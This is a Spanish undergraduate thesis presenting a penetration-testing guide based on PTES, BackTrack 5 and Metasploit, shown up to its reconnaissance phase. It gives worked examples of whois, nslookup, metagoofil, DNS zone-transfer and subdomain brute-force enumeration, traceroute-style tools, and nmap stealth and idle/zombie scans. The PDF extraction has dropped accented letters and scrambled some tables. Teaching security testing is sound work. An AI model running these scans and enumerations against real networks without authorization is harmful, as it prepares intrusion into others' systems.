Beruflich Dokumente
Kultur Dokumente
DIRECTOR DE PROYECTO:
ASESOR METODOLOGICO:
ABSTRACT
Hoy en da las pruebas de penetracin y las auditorias de seguridad informtica son
paradigmas de las tecnologas de la informacin que se realizan bajo diferentes plataformas
con herramientas avanzadas para identificar, detectar y explotar cualquier vulnerabilidad
que no se haya descubierto en un entorno de red determinado. Aplicando las metodologas
apropiadas junto con unos objetivos definidos y un plan de pruebas programado
meticulosamente obtendramos una prueba de penetracin slida sobre cualquier red de
computadores.
Esta gua de referencia tcnica est enfocada en proporcionar una orientacin sobre el
desarrollo de habilidades prcticas de pruebas de penetracin, por medio de herramientas
hackers de vanguardia, as como tambin, diversas tcnicas y estrategias desarrolladas paso
a paso y de
ataques de intrusin en una red de computadores, con el fin de reflejar ejemplos reales.
ABSTRACT (ingles)
Today, penetration
testing
and IT
of information
technologies that are performed under different platforms with advanced tools to identify,
detect and exploit any vulnerability that dont has been discovered in a given network.
Applying appropriate methodologies with defined objectives and a carefully planned test
plan would get a solid penetration test on any computer network.
It will also explain how to install and configure the different tools used in penetration
testing, will discuss about the different types of penetration testing methodologies to
discover security holes and a group of assessment tools needed to run the test penetration
through their respective categories such as: target scoping, Gathering information, Target
discovery, Enumerating Target, Vulnerability mapping, social engineering, exploitation,
privilege escalation, maintaining access and reporting.
TITULO:
DISEO E IMPLEMENTACIN DE UNA GUIA TCNICA PARA LA REALIZACIN
DE PRUEBAS DE PENETRACION Y EVALUACION DE LA SEGURIDAD
INFORMATICA EN UNA RED DE COMPUTADORES LAN
TIPO DE DOCUMENTO:
Trabajo de Grado para optar el ttulo de Ingeniero en Electrnica y Telecomunicaciones
AUTOR:
Jacques Eloite Berdejo Gutirrez
ENTIDAD O EMPRESA:
Hospital Municipal de Sabanagrande
PALABRAS CLAVES:
Pruebas de
penetracin (Pen-Testing),
Seguridad Informtica,
Redes de
Se abordan temas tales como la utilizacin de ciertas aplicaciones informticas, que tienen
como finalidad ayudar al ingeniero o al profesional de TI, encargado de administrar el
correcto funcionamiento de una red de computadores, a encontrar amenazas y agujeros en
la seguridad de la red. La importancia de esto en hallar dichas fallas y mitigar su impacto a
un mnimo; debido a que existe la posibilidad de que se pierda o sea robada informacin
vital de la empresa, la cual hoy en da es valorada como un activo muy valioso
METODOLOGA:
La verificacin de la validez de las tcnicas empleadas para la recoleccin de datos es
necesaria para asegurar un proyecto veraz, confiable y que este dentro de los cnones que
se dictan en la seguridad informtica. Se realizaran observaciones objetivas y exactas, para
describir, analizar e interpretar los datos obtenidos, en trminos claros y precisos.
6
FUENTES:
PRIMARIAS:
Libros, documentos, revistas, pginas Web, artculos, enciclopedias, manuales,
catlogos.
SECUNDARIAS:
Entrevistas no formales, visitas, observacin directa, pruebas en laboratorio
TIPO DE ESTUDIO:
Para el desarrollo de la investigacin es necesario emplear una metodologa idnea, la cual
sea apropiada para el tipo de proyecto que permita alcanzar los objetivos propuestos y
solucionar el interrogante central al igual que las inquietudes surgidas durante el desarrollo
del proyecto.
MTODO DE INVESTIGACIN:
Las pruebas de penetracin son un tema ya usado a nivel mundial y sobre el cual se ha
realizado toda clase de experimentacin y aplicaciones, de tal manera que la tecnologa
actual nos permite obtener hoy en da metodologas y herramientas tcnicas poderosas;
podemos decir que este proyecto inicia desde una base experimental muy bien especificada
y documentada, la cual nos da unos planteamientos tericos y una determinada situacin
tangible que, mediante la posterior integracin de elementos presentes en ella, podemos
hallarle una solucin a las necesidades identificadas en la descripcin del problema de este
anteproyecto. Por lo tanto emplearemos el mtodo deductivo como mtodo de
investigacin.
NOTA DE ACEPTACION
APROBADO
Ing. _____________________
Presidente del Jurado
Ing. ____________________
Jurado
DEDICATORIAS
10
AGRADECIMIENTOS
11
Tabla de Contenido
INTRODUCCIN ........................................................................................................ 14
2.
2.2.
2.3.
2.4.
2.5.
OBJETIVOS .......................................................................................................... 42
2.6.
METODOLOGA PROPUESTA.......................................................................... 43
3.
4.
5.
BIBLIOGRAFIA........................................................................................................ 101
12
LISTA DE FIGURAS
13
1. INTRODUCCIN
El rea de las telecomunicaciones enfocada a los
En las redes de computadores e internet son importantes los controles de acceso y las
polticas de seguridad aplicados sobre los servicios y recursos que poseen los servidores de
una determinada empresa, puesto que de ellos depende en gran medida la confidencialidad,
la preservacin y la integridad de los datos vitales de esta. Hoy en da existen aplicaciones
las cuales son muy usadas para comprobar si las polticas de seguridad y los controles que
realizan los administradores sobre la red, poseen agujeros o fallas. Es precisamente en este
proyecto en donde hacemos uso de la tecnologa informtica existente en el campo de la
seguridad de la informacin y las pruebas de penetracin para desarrollar esta propuesta.
La proliferacin de ataques mediante los virus y las amenazas que ello implica sobre una
red, y por ende sobre sus datos; nos permitieron desarrollar un gua tcnica para la
realizacin de pruebas de penetracin y la evaluacin de la seguridad informtica en una
red de computadores, basada sobre ciertas herramientas de alto rendimiento como lo son
14
BackTrack y Metasploit Framework. Esto con el fin de cumplir los objetivos planteados en
este documento. La idea general del proyecto es la de facilitar la tarea de los
administradores de red y a los profesionales de TI (Tecnologas de la Informacin) con
escasos o nulos conceptos sobre este tema; de tal forma que estos puedan mitigar los
errores intrnsecos .
Esta problemtica nos lleva a pensar en que las redes deben ser administradas y
vigiladas de una manera eficiente y cuidadosa por personal calificado en la seguridad de
las mismas. Y no solo esto, como las redes son manipuladas por usuarios, muchas veces
15
las herramientas usadas para su proteccin no son suficientes para que los usuarios, sea
por error o con intencin, no generen vulnerabilidades y posibles daos a la red.
Por esta razn es que el administrador de la red debe tener conocimiento de las diversas
polticas que pueden y deben instaurarse en una organizacin para proteger su
informacin. Esta gua tcnica est dirigida principalmente a formar las competencias
necesarias que habilitan a un administrador de red para proteger, controlar, politizar y
volver eficiente, la transferencia y uso de la informacin en las redes.
16
Certified Ethical Hacker: es una certificacin profesional promovida por el Consorcio Internacional de
Consultas de Comercio Electrnico
4
Certified Information Systems Security Professional: es una certificacin de seguridad de la informacin
profesional otorgada por la International Information Systems Security Certification Consortium",
5
Certified Information Systems Auditor (CISA) es una certificacin para auditores de sistemas de informacin
6
Cisco Certified Security Professional: certificacin de seguridad para dispositivos y sistemas basados en cisco
3
17
18
Antes de pasar a las metodologas de las pruebas de penetracin, debemos conocer los
diferentes conceptos y prerrequisitos relacionados con esta prctica. Este campo de
19
accin del ingeniero en este tema es muy amplio, cubre una gran cantidad de
informacin y conocimientos, que debemos dominar, para llevar a buen trmino nuestra
tarea de planificacin y puesta en marcha.
cada servicio nativo y deshabilitar aquellos que sean innecesarios, crear relaciones de
confianza entre componentes en red a travs de diversos mtodos. Tambin, auditar sus
archivos de registro, conocer bien los logs y cul es la informacin relevante que se
deposita en ellos, intentar el filtrado de protocolos y conexiones externas, mantener
actualizado todo lo posible (incluido el kernel en el caso de Linux), determinar qu
cosas no pueden dejarse por defecto (como passwords, usuarios, aplicaciones,
directorios, privilegios, configuraciones y archivos), probar aplicaciones y tecnologas
usuales como apache, mysql u openssl, etc.
21
equipos que traen consigo sus propias vulnerabilidades intrnsecas en sus softwares.
Como bien sabemos, la mayora de estos dispositivos trabajan en diferentes niveles del
modelo de referencia OSI9; por lo tanto, ejecutan diferentes protocolos de servicios para
cumplir con su tarea.
As pues podemos tomar como ejemplo uno de estos protocolos en particular como lo
es el SNMP10, este es un protocolo del nivel de aplicacin (nivel 7) que facilita el
intercambio de informacin de administracin entre dispositivos de red. Es parte de la
familia de protocolos TCP/IP, este permite a los administradores supervisar el
funcionamiento de la red, buscar y resolver sus problemas, y planear su crecimiento.
Actualmente est en su versin 3.
Para detectar fallos de red: Puede llevar una alarma al NMS cuando se apague un
dispositivo o se detecte un error de enlace con un router
Para auditar el uso de la red: Se puede auditar el uso de los equipos por sus
usuarios.
22
Antes de pasar a definir los diferentes tipos de ataques, se hace imprescindible hablar de
los estndares internacionales que controlan la seguridad informtica. Estos estn
encargados de asegurar los servicios de prevencin de riesgos y de asistencia a los
tratamientos de incidencia, como es el CERT/CC (Computer Emergency Response
Team/Coordination Center) del SEI (Software Engineering Institute) de la Carnegie
Mellon University; el cual proporciona dos mtodos para la evaluacin de riesgos en las
organizaciones; los cuales son el Mtodo OCTAVE y el Mtodo CURE. Estos poseen
cierto nmero de fases y procesos que permiten reducir los riesgos de ataques. As pues,
si tomamos el mtodo OCTAVE, los procesos, con sus respectivas fases, que estaran
involucrados en la bsqueda, anlisis y valoracin de vulnerabilidades serian: el
proceso 4 de la Fase I ; los procesos 5 y 6 de la Fase II.
12
23
Otra norma para la seguridad informtica es la ISO/IEC 27000. Esta norma proporciona
una visin general de las normas que componen la serie 27000, una introduccin a los
Sistemas de Gestin de Seguridad de la Informacin (SGSI); una breve descripcin del
proceso Plan-Do-Check-Act; trminos y definiciones que se emplean en toda la serie.
La serie ISO/IEC 27000 establece una gua de buenas prcticas que describe los
objetivos de control y controles recomendables en cuanto a seguridad de la
informacin. La norma ISO 27005:2008 contiene un anexo (Anexo D) que resume los
mtodos y ejemplos para valorar las vulnerabilidades tcnicas.
Existen dos metodologas confiables que a travs del tiempo han ganado reputacin en
el sector de la seguridad informtica y en particular en las pruebas de penetracin, estas
son: OSSTMM (Open Source Security Testing Methodology Manual) y PTES
(Penetration Testing Execution Standart).
1. Pruebas de Solicitud
2. Pruebas de Sugerencia Dirigida
3. Pruebas de las Personas Confiables
1. Logstica y Controles
2. Exploracin de Red
3. Identificacin de los Servicios del Sistema
25
1. Pruebas de PBX
2. Pruebas del Correo de Voz
3. Revisin del FAX
4. Pruebas del Modem
1. Revisin de Permetro
2. Revisin de monitoreo
3. Evaluacin de Controles de Acceso
4. Revisin de Respuesta de Alarmas
5. Revisin de Ubicacin
6. Revisin de Entorno
En este documento no haremos una explicacin detallada de cada norma, con sus
respectivos anexos, fases y procesos; porque est fuera del alcance del proyecto. Para
una mejor comprensin de ellos refirase a las siguientes direcciones web:
http://www.cert.org/octave,
http://www.iso27000.es/,
http://www.pentest-
standard.org/, http://www.isecom.org/
Actualmente existen un sin nmero de amenazas y ataques en la red, contra los cuales
debemos saber hacerle frente. Para esto, el conocimiento que tenemos de ellos es el
arma primordial que debe tener todo administrador de seguridad informtica.
En los siguientes prrafos se abordaran una serie de conceptos claves que permitirn
entender ms adecuadamente el problema y establecer un vocabulario con el que
referirse a los diferentes aspectos. La conceptualizacin y terminologa que se utilizar
pertenece en su mayor parte a la norma genrica.
28
i.
ii.
iii.
iv.
Por otra parte, las amenazas pueden ser accidentales o intencionales. Amenazas
accidentales son aquellas que aparecen de forma no premeditada: disfunciones en los
sistemas, fallos de software, operaciones indebidas por parte de algn usuario inexperto,
etc. El mtodo para su tratamiento y prevencin debe ser similar a los procedimientos
que se siguen en el caso de sistemas informticos aislados: revisin peridica de los
equipos, prueba del correcto funcionamiento de los programas informticos,
mantenimiento de las instalaciones, formacin adecuada del personal para evitar errores
29
humanos, etc. Debern ser tenidas en cuenta en un Anlisis de Riesgos global, pero su
incidencia en los protocolos especficos de seguridad es secundaria.
Seguidamente
podemos
nombrar
la
denegacin
de
servicio
llamado
El spoofing es un ataque que se basa en actuar en el nombre de otro usuario tal y como
si fuese l mismo. Este ataque se pueden realizar por diferentes protocolos, arrojando
variantes de ste, tales como: IP Spoofing, ARP Spoofing, DNS Spoofing, Web
Spoofing y Mail Spoofing.
31
Una tcnica usada para infiltrarse en una red Ethernet conmutada (basada en switch y
no en hubs) es el ARP Poissoning, el cual puede permitir al atacante husmear paquetes
de datos en la LAN, modificar el trfico, o incluso detenerlo. El principio del ARP
Spoofing es enviar mensajes ARP falsos (falsificados, o spoofed) a la Ethernet.
Normalmente la finalidad es asociar la direccin MAC del atacante con la direccin
IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace
predeterminada (gateway). Cualquier trfico dirigido a la direccin IP de ese nodo, ser
errneamente enviado al atacante, en lugar de a su destino real.
32
Podemos seguir hablando de los diferentes tipos de ataque, pero son demasiados para
abordarlos en este documento. De igual forma, podemos decir lo mismo de los
programas maliciosos creados para cumplir con el cometido de infiltrarse en las redes,
tales como gusanos, caballos de Troya, backdoors, etc. Podemos encontrar informacin
referente a ellos en muchas pginas creadas con este fin. Tenga en cuenta que debemos
conocer contra qu nos enfrentamos, por lo tanto no podemos tomar a la ligera este
conocimiento.
33
Cuando se lleva a cabo una evaluacin de vulnerabilidad desde afuera, se est tratando
de comprometer el sistema desde afuera. Al posicionarse desde afuera de la compaa
puede ver las cosas desde el punto de vista del intruso. Usted ve lo que ve un intruso
direcciones IP pblicas, sistemas en su DMZ, las interfaces externas de su cortafuegos y
ms. DMZ viene de "zona desmilitarizada" lo que corresponde a un computador o a una
pequea subred que se coloca entre la red confiable interna, tal como la LAN
corporativa, y una red externa no confiable, tal como la Internet. Tpicamente, la DMZ
contiene dispositivos accesibles al trfico de la Internet, tal como servidores Web
(HTTP), FTP, SMTP (correo electrnico) y servidores DNS.
34
35
Los administradores de seguridad son buenos en la medida que tambin lo sean las
herramientas que usen y el conocimiento que posean. Por ejemplo, tomemos cualquier
herramienta de evaluacin disponible en el mercado y ejecutmosla en un sistema. Es
casi que garantizado que se encontrar al menos algunos falsos positivos. Bien sea por
un error del programa o del usuario, el resultado es el mismo. La herramienta puede
encontrar vulnerabilidades que en realidad no existen (falsos positivos), o peor an, la
herramienta puede que no encuentre vulnerabilidades que actualmente si existen (falsos
negativos).
Las pruebas de penetracin son una forma de simular los mtodos que un atacante
podra utilizar para eludir los controles de seguridad y acceso al sistema de
una organizacin. Las pruebas de penetracin son ms que el mero funcionamiento de
escneres y herramientas automatizadas con el fin de obtener un informe escrito de las
36
En
la
actualidad, hay
un
cambio en
la
forma
de definir las
pruebas
de
Las PTES estn basadas en 7 fases, que estn diseadas para asegurar que la
organizacin y sus clientes posean un nivel estandarizado de seguridad basado en la
norma. Las siete categoras en las que se divide la norma poseen diferentes niveles de
esfuerzo requerido por cada una de ellas, dependiendo de la organizacin bajo ataque.
Las fases son:
37
Estas son:
White Box Test: es un chequeo llevado a cabo por un pen-tester que tiene toda
la informacin acerca del sistema.
Black Box Test: este chequeo es llevado a cabo desde cero, sin informacin, tal
como lo hara un intruso cualquiera y lleva mucho ms tiempo.
Grey Box Test: se cuenta con conocimientos parciales del objetivo, siempre
brindados por la misma organizacin.
13
38
39
Linux y que se puede trabajar de en vivo (Live) o mediante instalacin en el disco duro.
Las herramientas incluidas en el BackTrack 5 son las siguientes:
Mapeo de la red: esta categora contiene varias herramientas que pueden ser
usadas para revisar los computadores y dispositivos de interconexin activos en
la red, revisar y recolectar las huellas digitales (fingerprints) de los sistemas
operativos, para revisar las aplicaciones usadas por el equipo objetivo, y tambin
para realizar un escaneo de los puertos.
14
Se llama fuzzing a las diferentes tcnicas de testeo de software capaces de generar y enviar datos secuenciales o
aleatorios a una o varias reas o puntos de una aplicacin, con el objeto de detectar defectos o vulnerabilidades existentes
en el software auditado. Es utilizado como complemento a las prcticas habituales de chequeo de software, ya que
proporcionan cobertura a fallos de datos y regiones de cdigo no testados, gracias a la combinacin del poder de la
aleatoriedad y ataques heursticos entre otros.
40
Penetracin: esta categora contiene herramientas que pueden ser usadas para
explotar las vulnerabilidades encontradas en la maquina objetivo.
Adems de este conjunto de herramientas BackTrack posee otras que se pueden usar en:
Informtica Forense e ingeniera inversa.
complejas.
Este
permite concentrarse
en los
aspectos
singulares o
41
Tambin existen manuales y libros que exponen el uso de las herramientas antes
mencionadas. Presentan diferentes escenarios de ataque con los cuales podemos
aprender a usar las rutinas necesarias para descubrir, evaluar y mitigar las fallas de
seguridad.
2.5. OBJETIVOS
42
Las diferentes etapas establecidas que constituyen el mtodo aplicado por los
investigadores en el presente proyecto son: fase preliminar, anlisis general, anlisis
especfico, diseo, implementacin, operacin y mantenimiento, en donde la promocin
43
44
Tabla #?: Fases del estndar PTES (Penetration Testing Execution Standart)
DESCRIPCIN
FASES
Interacciones de Compromiso
Organizacional
(Pre-engagement Interactions)
Recoleccin de Datos
(Intelligence Gathering)
45
Anlisis de Vulnerabilidades
(Vulnerability Analysis)
un ataque con
46
Post - Explotacin
(Post Exploitation)
Reporte
(Reporting)
se
debe
proporcionar
un alto
nivel de
47
FASE I:
Interacciones de Pre-compromiso Organizacional: sta fase define todas las actividades
de pre-compromiso organizacional con el cliente, y define el alcance de la prueba de
penetracin.
FASE II:
La Recoleccin de datos: Se usa para reunir tanta informacin como sea posible para ser
utilizados cuando se penetra en el objetivo, durante la evaluacin de la vulnerabilidad y las
fases de explotacin. Cuanta ms informacin usted es capaz de reunir durante esta fase,
son ms los vectores de ataque que pueda usar en el futuro.
Se debe tener en cuenta que los procedimientos descritos en esta fase pueden, realmente,
daar su sistema y el sistema objetivo, as que asegrese de configurar un entorno de
prueba. Muchos de los ejemplos aqu presentados pueden ser destructivos y hacer que la
maquina atacada quede inutilizable. Las actividades mencionadas aqu se podran
considerar ilegales si se llevan a cabo por alguien con malas intenciones, por lo que se
sugiere, de forma enftica, seguir las reglas.
48
red, e incluso saber qu sistema operativo y cual software de servidor web se est
utilizando en la red de destino.
Las herramientas usadas en Metasploit Framework para cumplir con esta fase del Pentesting son:
Whois Lookups
Comencemos usando la herramienta Whois Lookup de BackTrack, que hace parte del
arsenal de aplicaciones del Metasploit, y que es usada para buscar los nombres de
servidores de dominio DNS
msf > whois secmaniac.net
[*] exec: whois secmaniac.net
. . . SNIP . . .
Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: SECMANIAC.NET
Created on: 03-Feb-10
Expires on: 03-Feb-12
Last Updated on: 03-Feb-10
Domain servers in listed order:
NS57.DOMAINCONTROL.COM
NS58.DOMAINCONTROL.COM
49
Site
http://www.secmaniac.com
Last reboot
unknown
Domain
secmaniac.com
Netblock
owner
Linode
IP address
75.118.185.142
Site rank
103097
Nameserver
ns1.secmaniac.com
Country
US
Uptime graph
Date first
seen
April 2010
DNS admin
admin@dnsimple.com
Domain
Registrar
enom.com
Reverse
DNS
li376-220.members.linode.com
Check
another site:
Netcraft Site
Report
[More Netcraft Gadgets]
Gadget
Luego habiendo identificado la direccin IP del sitio web, realizamos un whois lookup para
esta direccin IP
msf > whois 75.118.185.142
[*] exec: whois 75.118.185.142
WideOpenWest Finance LLC WIDEOPENWEST (NET-75-118-0-0-1)
75.118.0.0 - 75.118.255.255
WIDEOPENWEST OHIO WOW-CL11-1-184-118-75 (NET-75-118-184-0-1)
75.118.184.0 - 75.118.191.255
Vemos que del whois lookup realizado, la direccin IP (WIDEOPENWEST) aparece como
un proveedor de servicio legtimo. Mientras que el actual rango de subred no est
especficamente registrado a secmaniac.net o secmaniac.com, podemos decir que este sitio
50
aparece como alojado dentro de una ubicacin propia, esto se puede percibir porque el
bloque de direcciones IP aparece como una parte de un rango residencial de direcciones
NSLookup
Para conseguir informacin adicional de un servidor,
root@bt:~# nslookup
set type=mx
> secmaniac.net
Server: 172.16.32.2
Address: 172.16.32.2#53
Non-authoritative answer:
secmaniac.net mail exchanger = 10 mailstore1.secureserver.net.
secmaniac.net mail exchanger = 0 smtp.secureserver.net.
En este punto hemos recopilado cierta informacin valiosa la cual podramos usar para
realizar un ataque contra la maquina o el sistema objetivo. Sin embargo, tendremos que
recurrir a las tcnicas de recopilacin de informacin activa para determinar el estado de los
puertos de la direccin IP objetivo, la cual es 75.118.185.142.
51
Las herramientas usadas en BackTrack 5 que se usan para cumplir con esta fase del Pentesting son:
Metagoofil
Es usada para recolectar informacin de documentos disponibles en el dominio objetivo. La
ventaja de usar esta herramienta es que no se accede a la informacin directamente, sino a
travs de Google, de tal forma que el sitio web atacado no sabr quien est realizando las
acciones sobre l.
# cd /pentest/enumeration/google/metagoofil
# ./metagoofil.py
52
Donde cada una de las opciones esta descritas en el cuadro anterior. El resultado de un
posible comando valido puede ser:
[+] Command extract found, proceeding with leeching
[+] Searching in targetdomain for: pdf
[+] Total results in google: 1480
[+] Limit: 20
[+] Searching results: 0
[ 1/20 ] http://targetdomain/knowledge_warehouse/Netbook.pdf
[ 2/20 ] http://targetdomain/Bulletin/Edisi_4_Agustus_1.pdf
...
[+] Searching in targetdomain for: doc
[+] Total results in google: 698
[+] Limit: 20
[+] Searching results: 0
[+] Directory test already exist, reusing it
...
[ 8/20 ] http://targetdomain/data/file20070813152422391.doc
[ 9/20 ] http://targetdomain/data/file20080224161424426.doc
...
[+] Searching in targetdomain: xls
[+] Total results in google: 212
[+] Limit: 20
[+] Searching results: 0
[+] Directory test already exist, reusing it
[ 1/20 ] http://targetdomain/data/Unpublish/1000Sumatera.xls
[ 2/20 ] http://targetdomain/data/Unpublish/1200Sumut.xls
...
Usernames found:
================
Author(User)User
Regulator
Lawful
user
USER
Monitoring
Pink-7
Paths found:
\
(Windows\))/Author(User)/\
Normal\
53
Podemos ver que por medio de esta herramienta lo siguiente: la bsqueda se hace el
targetdomain, el cual puede ser cualquier servidor o host que almacene documentos. El
lmite de bsqueda de documentos es 20. En caso de encontrar un documento metagoofil
mostrara una lnea con la direccin web donde est el documento, por ejemplo:
http://targetdomain/knowledge_warehouse/Netbook.pdf.
Informacin DNS
Las herramientas agrupadas en esta categora pueden ser usadas para obtener informacin
acerca del Sistema de Nombres de Dominio, tambin conocido como DNS (Domain Name
System), as como tambin la configuracin del Servidor DNS. Comenzamos con:
DNS Walk
Esta herramienta busca informacin completa de la lista de direcciones IP almacenados en
un servidor DNS. Esta funciona usando una transferencia de zona DNS, la cual es un
mecanismo usado para replicar una base de datos desde un servidor DNS maestro a otro
servidor DNS, usualmente llamado servidor DNS esclavo. Con este mecanismo los
servidores DNS se sincronizan, en donde dicha sincronizacin en el protocolo DNS es
usada por el que realiza la prueba de penetracin para recopilar informacin del dominio
objetivo.
54
# cd /pentest/enumeration/dns/dnswalk
# ./dnswalk targetdomain.
Debe tenerse en cuenta que hoy en da los servidores DNS no permiten la transferencia de
zona; los administradores de red monitorizan este comportamiento debido a que
representan una alarma de ataque contra el servidor.
DNSenum
Esta herramienta funciona de la misma forma que dns walk, pero tiene unos enfoques
adicionales, los cuales son: es capaz de conseguir nombres de subdominios extra usando
Google search engine; halla nombres de subdominios mediante fuerza bruta (dnsenum
incluye un archivo de texto llamado dns.txt que contiene 95 nombres de subdominios;
puede llevar a cabo consultas whois en los intervalos de dominio de red clase C y calcula
55
los rangos de red; lleva a cabo bsquedas inversas (reverse lookup) en un determinado
intervalo de red; usa threads (hilos) para realizar diferentes consultas.
56
1800
IN
192.168.xx.xx
1515
1515
1514
IN
IN
IN
A
A
A
192.168.xx.xx
192.168.xx.xx
192.168.xx.xx
1458
IN
192.168.xx.xx
En el caso anterior se muestra cuando no es posible realizar una transferencia de zona, por
lo tanto se intentar usar un ataque de fuerza bruta a partir del archivo dns.txt. Este ser
el comando apropiado:
# ./dnsenum.pl -f dns.txt targetdomain
57
IN
IN
IN
IN
IN
IN
A
A
A
A
A
A
192.168.xx.xx
192.168.xx.xx
192.168.xx.xx
192.168.xx.xx
192.168.xx.xx
192.168.xx.xx
58
Aqu se puede observar una valiosa informacin recopilada tal como las direcciones IP
internas, y los mapas de direcciones IP de los host activos (Alive).
Informacin de enrutamiento
En esta categora se agrupan ciertas herramientas especializadas en la recoleccin de
informacin sobre el enrutamiento
0trace
Es una herramienta que puede ser usada de forma pasiva para rastrear la ruta entre el pentester y el dispositivo objetivo. Usa protocolos comunes como HTTP o SNMP para
alcanzar el firewall, y utiliza paquetes basados en TTL (Time To Live). Para usar esta
herramienta se escribe el siguiente comando sobre el Shell:
# /usr/local/sbin/0trace.sh eth0 ww.xx.yy.zz
59
7 ww.xx.yy.zz
Target reached
Itrace
Esta es una herramienta capaz de realizar la tarea de traceroute, pero realizando solicitudes
de eco ICMP (Internet Control Message Protocol). Si un firewall bloquea un traceroute,
pero permite una solicitud de eco ICMP, entonces se puede itrace para trazar la ruta detrs
de un firewall. Con el siguiente comando se activa la funcionalidad de esta herramienta
root@bt:/pentest/enumeration/irpas#
# itrace -i<device> -d<targethost>
60
NMap
Habiendo identificado el rango de direcciones IP de la red donde est ubicado el equipo
objetivo mediante el mtodo pasivo de recoleccin de informacin, comenzamos
escaneando los puertos en busca de aquellos que estn abiertos. Este es un proceso en
donde meticulosamente conectamos con los puertos de la maquina remota, con el fin de
identificar cul de ellos estn activos y escuchando. La herramienta que mas uso tiene para
este cometido es NMap. Para realizar un escaneo exitoso, esta herramienta se basa en un
conjunto de banderas o flags, las cuales hacen que su desempeo sea verstil para
nuestros requerimientos en la bsqueda de informacin til.
La mayora de las banderas preferidas en NMap son sS. Esta permite correr un escaneo
TCP en modo furtivo (stealth) que determina si un puerto basado en TCP est abierto. Otra
opcin muy til es la Pn, la cual le dice a NMap que no use un ping16 para determinar si
un sistema determinado est corriendo, sino que considere a todos los computadores vivos
(alive, en funcionamiento). Para desarrollar una prueba de penetracin por medio del
internet se recomienda usar estas banderas, debido a que la mayora de las redes no
permiten ICMP para realizar un escaneo activo sobre la red, puesto que este protocolo usa
ping.
El siguiente ejemplo muestra el uso de esta herramienta, con la cual realizamos un escaneo
rpido (quick scan) en BackTrack Linux 5, usando las banderas antes descritas:
16
Utilidad diagnstica en redes de computadoras que comprueba el estado de la conexin del host local con uno o varios equipos
remotos de una red TCP/IP por medio del envo de paquetes ICMP de solicitud y de respuesta
61
Como se puede ver en el anlisis, NMap reporta una lista de los puertos abiertos, junto con
una descripcin del servicio asociado al puerto. Para obtener un mayor detalle, se puede
usar la bandera A. esta opcin intentar realizar una numeracin avanzada de los servicios
y la captura de banner, la cual le puede dar aun mayor detalle del sistema objetivo.
Por ejemplo:
root@bt:~# nmap -Pn -sS -A 172.16.32.131
Nmap scan report for 172.16.32.131
Host is up (0.0035s latency).
Not shown: 993 closed ports
PORT
STATE
SERVICE
VERSION
135/tcp
open
msrpc
Microsoft Windows RPC
139/tcp
open
netbios-ssn
445/tcp
open
microsoft-ds
Microsoft Windows XP microsoft-ds
777/tcp
open
unknown
1039/tcp
open
unknown
1138/tcp
open
msrpc
Microsoft Windows RPC
1433/tcp
open
ms-sql-s
Microsoft SQL Server 2005 9.00.1399; RTM
. . . SNIP . . .
Device type: general purpose
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003
62
63
El uso del modulo scanner/ip/ipidseq de Metasploit Framework para buscar un host que
se ajuste a los requerimientos de un TCP idle scan, se muestra a continuacin:
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(ipidseq) > show options
Module options:
Name
Current Setting
Required
------------------------GWHOST
no
INTERFACE
no
LHOST
no
RHOSTS
yes
RPORT
80
yes
SNAPLEN
65535
yes
THREADS
1
yes
TIMEOUT
500
yes
Description
----------The gateway IP address
The name of the interface
The local IP address
The target address range or CIDR identifier
The target port
The number of bytes to capture
The number of concurrent threads
The reply read timeout in milliseconds
Esta lista muestra las opciones requeridas por el escaneo ipidseq. Se puede resaltar a la
opcin RHOSTS la cual puede tomar rangos IP (tales como 192.168.1.20-192.168.1.30);
tambin rangos CIDR (Classless Inter-Domain Routing) (tales como 192.168.1.0/24);
tambin mltiples rangos separados por comas (tales como 192.168.1.0/24,192.168.3.0/24);
y archivos de texto con un host por lnea (tal como file:/tmp/hostlist.txt). Todas estas
opciones dadas nos dan una ciertas flexibilidades para un objetivo especfico.
64
Observamos un nmero potencial de hosts inactivos, los cuales podemos usar para realizar
un TCP idle scan, ahora escaneamos el sistema usando la direccin IP 192.168.1.109, pero
usando la bandera sI para especificar el host inactivo, as pues tenemos:
msf auxiliary(ipidseq) > nmap -PN -sI 192.168.1.109 192.168.1.155
[*] exec: nmap -PN -sI 192.168.1.109 192.168.1.155
Idle scan using zombie 192.168.1.109 (192.168.1.109:80); Class: Incremental
Interesting ports on 192.168.1.155:
Not shown: 996 closed|filtered ports
PORT
STATE
SERVICE
135/tcp
open
msrpc
139/tcp
open
netbios-ssn
445/tcp
open
microsoft-ds
MAC Address: 00:0C:29:E4:59:7C (VMware)
65
Ahora hemos descubierto un nmero de puertos abiertos en el host objetivo sin enviar un
paquete al sistema.
Por ejemplo, supongamos que tenemos un sistema que detrs del firewall est usando NAT
(Network Address Translation). Dicho sistema usa direcciones IP privadas, las cuales no
pueden contactarse fcilmente desde el internet. Si se usa Metasploit para comprometer el
sistema que est detrs del NAT, se podra utilizar este sistema interno comprometido para
pasar el trfico interno (pivote) al sistema basado en direcciones IP privadas y que esta
internamente alojado, con el fin de penetrar en la red ms all del firewall.
Para ver la lista de las herramientas que Framework ofrece, ingrese el siguiente comando:
msf > search portscan
66
Vamos a realizar un simple escaneo de un solo host utilizando un escaneo de puerto SYN
que posee el Metasploit. En el siguiente listado, iniciamos la exploracin con el comando
use scanner/portscan/syn, establecemos RHOSTS a 192.168.1.155, configuramos
THREADS a 50, y luego ejecutamos el anlisis.
msf > use scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf auxiliary(syn) > set THREADS 50
THREADS => 50
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.1.155:135
[*] TCP OPEN 192.168.1.155:139
[*] TCP OPEN 192.168.1.155:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(syn) >
Del resultado podemos ver a los puertos 135, 139 y 445 abiertos, para la direccin IP
192.168.1.155.
FASE III:
El modelamiento de amenazas: En esta seccin se define un enfoque de modelado de
amenazas segn sea necesario para una correcta ejecucin de las pruebas de penetracin. La
norma no hace uso de un modelo especfico, sino que requiere que el modelo utilizado sea
consistente en trminos de su representacin de las amenazas, sus capacidades, sus
calificaciones por la organizacin que se est probando, y la posibilidad de aplicarlos varias
veces a las pruebas en un futuro para averiguar si se obtienen los mismos resultados.
67
68
Modelado de la motivacin
FASE IV:
Anlisis de Vulnerabilidades: Las pruebas de vulnerabilidad es el proceso de
